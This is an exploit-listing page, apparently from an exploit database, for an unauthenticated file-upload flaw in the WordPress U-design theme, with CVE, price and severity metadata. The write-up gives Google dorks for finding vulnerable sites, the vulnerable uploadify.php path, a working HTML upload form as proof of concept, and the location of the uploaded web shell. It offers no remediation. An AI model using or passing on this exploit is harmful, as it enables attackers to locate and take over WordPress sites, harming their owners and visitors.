Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-24371 | CWE-434 | $500 | Critical |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2017-06-01 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
WordPress Themes U-design File Upload Exploit Title : WordPress Themes U-design File Upload Author : Mohammad peywasteh Telegram : @kambod Tested : Win10 ------------------------------------------- Dork: inurl:/wp-content/themes/u-design Google Dork : inurl:/wp-content/themes/[u/design OR u-design ] Exploit : https://localhost/ wp-content/themes/[u/design OR u-design ]/scripts/admin/uploadify/uploadify.php Vulnerability : Exploit Page PoC : <form method="POST" action="https://localhost/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php" enctype="multipart/form-data"> <input type="file" name="Filedata" /> <button>Upload!</button><br/> </form> File Access : https://localhost/patch/shell.php ---------------------------------------------
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.